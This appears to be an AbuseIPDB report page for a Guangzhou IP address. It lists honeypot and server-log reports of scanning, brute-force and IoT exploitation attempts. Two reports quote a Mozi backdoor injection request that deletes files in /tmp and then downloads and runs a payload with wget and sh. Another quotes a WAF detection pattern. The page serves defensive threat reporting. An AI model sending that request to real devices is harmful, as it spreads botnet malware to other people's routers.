JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 120.85.114.53

120.85.114.53 was found in our database!

This IP was reported 209 times. Confidence of Abuse is 4%: ?

ISP	United-Communications-Network-Technology-Co-Ltd, GuangZhou
Usage Type	Fixed Line ISP
ASN	AS17622
Domain Name	chinaunicom.cn
Country	🇨🇳 China
City	Guangzhou, Guangdong

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 120.85.114.53

Whois 120.85.114.53

IP Abuse Reports for 120.85.114.53:

This IP address has been reported a total of 209 times from 33 distinct sources. 120.85.114.53 was first reported on April 9th 2021, and the most recent report was 2 days ago.

Recent Reports: We have received reports of abusive activity from this IP address within the last week. It is potentially still actively engaged in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇺🇸 TPI-Abuse	2026-06-23 23:23:33 (2 days ago)	(mod_security) mod_security (id:210831) triggered by 120.85.114.53 (-): 1 in the last 300 secs; Port ... show more (mod_security) mod_security (id:210831) triggered by 120.85.114.53 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Tue Jun 23 19:23:29.340804 2026] [security2:error] [pid 1262:tid 1269] [client 120.85.114.53:16460] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:^(?:microsoft url\|user-Agent\|www\\\\.weblogs\\\\.com\|(?:jakart\|vi)a\|(google\|i{0,1}explorer{0,1}\\\\.exe\|(ms){0,1}ie( [0-9.]{1,}){0,1} {0,1}(compatible( browser){0,1}){0,1})$)\|\\\\bdatacha0s\\\\b\|; widows\|\\\\\\\\r\|a(?: href=\|d(?:sarobot\|vanced email extractor ..." at REQUEST_HEADERS:User-Agent. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/03_Global_Agents.conf"] [line "29"] [id "210831"] [rev "2"] [msg "COMODO WAF: Rogue web site crawler\|\|www.aapm.info\|F\|4"] [data "User-Agent"] [severity "WARNING"] [tag "CWAF"] [tag "Agents"] [hostname "www.aapm.info"] [uri "/"] [unique_id "ajsVcfB-dsNhkqjDsUG9DwAAAQQ"], referer: https://www.aapm.info/ show less	Brute-Force Bad Web Bot Web App Attack
🇬🇧 PeravixGroup	2026-04-26 13:55:09 (2 months ago)	Honeypot detection: IoT / router remote code execution attempt (Mirai/Mozi family) on port 8080. Sev ... show more Honeypot detection: IoT / router remote code execution attempt (Mirai/Mozi family) on port 8080. Severity: CRITICAL. Aaran.cloud show less	Hacking IoT Targeted
🇬🇧 PeravixGroup	2026-04-26 03:31:27 (2 months ago)	Honeypot detection: Telnet / IoT device brute-force or exploitation attempt on port 23. Severity: HI ... show more Honeypot detection: Telnet / IoT device brute-force or exploitation attempt on port 23. Severity: HIGH. Aaran.cloud show less	IoT Targeted Brute-Force
🇬🇧 PeravixGroup	2026-04-24 09:38:04 (2 months ago)	HoneyPot hit - Aaran.cloud \| Rce Attempt \| command injection \| GET /setup.cgi?next_file=netgear.cfg& ... show more HoneyPot hit - Aaran.cloud \| Rce Attempt \| command injection \| GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi show less	Web App Attack
🇨🇳 ThreatBook.io	2026-04-23 22:24:34 (2 months ago)	ThreatBook Intelligence: Zombie,Mobile more details on https://threatbook.io/ip/120.85.114.53	SSH
🇮🇹 Fusty	2026-04-22 22:34:50 (2 months ago)	Unauthorized attempt on (TCP on port 23). Source port: 31518 TTL: 50 Packet length: 60 Timestamp: 20 ... show more Unauthorized attempt on (TCP on port 23). Source port: 31518 TTL: 50 Packet length: 60 Timestamp: 2026-04-23 00:34:50 show less	Port Scan Hacking Brute-Force
Anonymous	2025-12-05 10:42:17 (6 months ago)	Unauthorized connection attempt	Port Scan Hacking Exploited Host
🇩🇪 barbarella	2025-12-03 22:05:44 (6 months ago)	Tried to install Mozi backdoor (GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/;w ... show more Tried to install Mozi backdoor (GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1) show less	Hacking Web App Attack
Anonymous	2025-02-06 00:09:41 (1 year ago)	Unauthorized connection attempt	Port Scan Hacking Exploited Host
Anonymous	2025-01-11 12:08:13 (1 year ago)	Unauthorized connection attempt	Port Scan Hacking Exploited Host
Anonymous	2024-08-08 22:25:09 (1 year ago)	Try to connect to Port_Scan_8080_tcp	Port Scan
🇺🇸 MPL	2024-08-05 14:56:58 (1 year ago)	tcp/8080 (3 or more attempts)	Port Scan
🇺🇸 MPL	2024-08-05 14:56:58 (1 year ago)	tcp/8080 (3 or more attempts)	Port Scan
🇮🇳 TC Saini	2024-08-02 14:00:37 (1 year ago)	"Indicators of compromise (IoCs) reported by the GOVT India"	Blog Spam Exploited Host IoT Targeted
🇮🇳 TC Saini	2024-08-02 14:00:37 (1 year ago)	"Indicators of compromise (IoCs) reported by the GOVT India"	Blog Spam Exploited Host IoT Targeted

Showing 1 to 15 of 209 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇱🇻 81.30.98.44

🇺🇸 74.125.180.28

🇨🇳 27.24.141.111

🇧🇪 198.235.24.232

🇨🇳 180.184.176.148

🇺🇸 162.216.150.59

🇫🇷 140.99.203.99

🇷🇺 77.40.61.5

🇮🇶 65.20.167.78

🇵🇰 39.34.169.24

🇩🇪 217.160.144.92

🇺🇸 147.185.132.230

🇨🇳 116.249.136.35

🇭🇰 112.120.152.167

🇮🇩 103.78.105.144

🇰🇷 61.76.136.25

🇳🇱 45.148.10.141

🇺🇦 23.27.184.239

🇭🇰 199.45.154.131

🇬🇧 195.206.182.215